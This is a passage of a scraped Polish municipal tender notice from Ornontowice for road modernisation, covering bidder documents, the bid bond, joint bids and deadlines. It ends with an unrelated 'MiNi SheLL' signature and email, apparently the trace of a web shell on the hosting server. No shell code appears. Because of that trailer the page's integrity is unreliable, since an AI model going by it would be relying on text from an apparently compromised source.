spełnianie warunków udziału w postępowaniu w zakresie, w jakim każdy z Wykonawców wykazuje spełnianie warunków udziału w postępowaniu;<br/>2) podmiot udostępniający zasoby, na którego potencjał powołuje się Wykonawca celem potwierdzenia spełnienia warunków udziału w postępowaniu. W takim przypadku oświadczenie potwierdza brak podstaw wykluczenia podmiotu oraz spełnianie warunków udziału w postępowaniu w zakresie, w jakim podmiot udostępnia swoje zasoby Wykonawcy.<br/>1.4. Do oferty Wykonawca zobowiązany jest dołączyć:<br/>1) odpis lub informację z Krajowego Rejestru Sądowego, Centralnej Ewidencji i Informacji o Działalności Gospodarczej lub innego właściwego rejestru potwierdzającego, że osoba działająca w imieniu Wykonawcy jest umocowana do jego reprezentowania,<br/>2) pełnomocnictwo lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy, gdy umocowanie osoby składającej ofertę nie wynika z dokumentów opisanych w rozdziale V ust. 1 ppkt 1.4. 1),<br/>3) zobowiązanie, o którym mowa w rozdziale I, sekcja 5 ust. 5.3 oraz 5.4 SWZ w przypadku polegania na zasobach podmiotu udostępniającego zasób Wykonawcy,<br/>4) w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia:<br/>a) pełnomocnictwo, w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, z treści którego będzie wynikało umocowanie do reprezentowania ich w postępowaniu o udzielenie zamówienia albo do reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo powinno zawierać w szczególności wskazanie:<br/>- postępowania zamówienia publicznego, którego dotyczy,<br/>- wszystkich Wykonawców ubiegających się wspólnie o udzielenie zamówienia wymienionych z nazwy z określeniem adresu siedziby,<br/>- ustanowionego pełnomocnika oraz zakresu jego pełnomocnictwa,<br/>b) oświadczenie, o którym mowa w rozdziale I sekcja 4 ust. 4.4 SWZ (Zamawiający dopuszcza złożenie tego oświadczenia na formularzu ofertowym); <br/>1.5. Wykonawca nie jest zobowiązany do złożenia dokumentów, o których mowa w rozdziale V ust. 1 ppkt 1.4. 1), jeżeli Zamawiający może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, o ile Wykonawca wskazał dane umożliwiające dostęp do tych dokumentów.<br/>1.6. Zapisy rozdziału V ust. 1 ppkt 1.4. pkt 2) stosuje się odpowiednio do osoby działającej w imieniu Wykonawców wspólnie ubiegających się o udzielenie zamówienia.<br/>1.7. Zapisy rozdziału V ust. 1 ppkt 1.4. pkt 1) i pkt 2), ust. 1.5 stosuje się odpowiednio do osoby działającej w imieniu podmiotu udostępniającego zasoby na zasadach określonych w art. 118 ustawy Pzp.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">2. OŚWIADCZENIA I DOKUMENTY SKŁADANE NA WEZWANIE<br/>2.1. Zgodnie z art. 274 ust. 1 ustawy Pzp, Zamawiający przed wyborem najkorzystniejszej oferty wezwie Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w wyznaczonym terminie, nie krótszym niż 5 dni, aktualnych na dzień złożenia, następujących podmiotowych środków dowodowych:<br/>2.1.1. wykazu osób, skierowanych przez Wykonawcę do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, uprawnień, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności oraz informacją o podstawie do dysponowania tymi osobami. Ww. wykaz stanowi załącznik nr 3 do SWZ;<br/>2.1.2. wykazu robót budowlanych wykonanych nie wcześniej niż w okresie ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie, wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania oraz podmiotów, na rzecz których roboty te zostały wykonane, oraz załączeniem dowodów określających, czy te roboty budowlane zostały wykonane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane zostały wykonane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty. Ww. wykaz stanowi załącznik nr 6 do SWZ;<br/>Jeżeli Wykonawca powołuje się na doświadczenie w realizacji robót budowlanych, wykonywanych wspólnie z innymi Wykonawcami, wykaz, o którym mowa powyżej dotyczy robót budowlanych, w których wykonaniu Wykonawca ten bezpośrednio uczestniczył.<br/>2.1.3. dokumentu potwierdzającego, że Wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia na sumę gwarancyjną określoną przez Zamawiającego.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Zamawiający wymaga wniesienia przez Wykonawcę wadium w kwocie 30 000,00 zł (słownie: trzydzieści tysięcy złotych i 00/100), Urząd Gminy w Ornontowicach, ul. Zwycięstwa 26a, 43-178 Ornontowice, http://e-zp.ornontowice.pl.<br/>2. Wadium należy wnieść do upływu terminu składania ofert, to jest do dnia 24.03.2023 roku, do godz. 11:00.<br/>3. Wadium w formie pieniężnej należy wnieść do upływu terminu składania ofert przy czym powyższe oznacza, że kwota wadium do godz. 11:00 dnia 24.03.2023 r. musi znajdować się na rachunku Zamawiającego: Gmina Ornontowice Nr rachunku: 28 8454 1053 2001 0011 0695 0009<br/>z podaniem w tytule wpłaty: Modernizacja dróg gminnych, nr referencyjny: ZWRZP.271.00011.2023.<br/> Szczegóły opisano w rozdziale VII SWZ. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 4. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia publicznego<br/>4.1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia publicznego. W takim przypadku Wykonawcy występujący wspólnie są zobowiązani do ustanowienia pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy w sprawie przedmiotowego zamówienia publicznego. Wszelka korespondencja będzie prowadzona przez Zamawiającego wyłącznie z pełnomocnikiem.<br/>4.2. Warunek dotyczący uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej (o ile został sformułowany), o którym mowa w art. 112 ust. 2 pkt 2 ustawy Pzp, zostanie spełniony, jeżeli co najmniej jeden z Wykonawców wspólnie ubiegających się o udzielenie zamówienia posiada uprawnienia do prowadzenia określonej działalności gospodarczej lub zawodowej i zrealizuje roboty budowlane, do których realizacji te uprawnienia są wymagane.<br/>4.3. W odniesieniu do warunków dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia (o ile zostały sformułowane) Wykonawcy wspólnie ubiegający się o udzielenie zamówienia mogą polegać na zdolnościach tych z Wykonawców, którzy wykonają roboty budowlane, do realizacji których te zdolności są wymagane.<br/>4.4. W przypadku, o którym mowa w ust. 4.2 i 4.3, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają odpowiednio do oferty oświadczenie, z którego wynika, które roboty budowlane wykonają poszczególni Wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.2.) Informacje na temat zaliczek: </h3> Zamawiający dopuszcza udzielenie na poczet realizacji zamówienia zaliczki w wysokości 5% wynagrodzenia. Szczegóły opisano w Załączniku nr 5 do SWZ - Projektowane postanowienia umowy. <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Zamawiający przewiduje możliwość zmian postanowień zawartej umowy w stosunku do złożonej oferty w przypadku wystąpienia okoliczności wymienionych w art. 455 ust. 1 pkt 2 do 4 oraz art. 455 ust. 2 ustawy albo okoliczności przewidzianych zgodnie z art. 455 ust. 1 pkt 1 ustawy i w § 17 umowy. Szczegóły opisano w załączniku nr 5 Projektowane postanowienia umowy do SWZ. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.6.) Zamawiający przewiduje następujące wymagania związane z realizacją zamówienia: </h3> <p class="mb-0">w zakresie zatrudnienia na podstawie stosunku pracy, w okolicznościach, o których mowa w art. 95 ustawy</p> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2023-03-24 11:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">System e-ZP Gminy Ornontowice</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2023-03-24 11:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2023-04-22</span></h3> <h3 class="mb-0">8.5.) Zamawiający przewiduje wybór najkorzystniejszej oferty z możliwością negocjacji: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Wykonawca, którego oferta zostanie uznana za najkorzystniejszą, zobowiązany jest do wniesienia zabezpieczenia należytego wykonania umowy w wysokości 5 % ceny całkowitej podanej w ofercie. Szczegóły opisano w załączniku nr 5 - Projektowane postanowienia umowy.

Creat By MiNi SheLL
Email: jattceo@gmail.com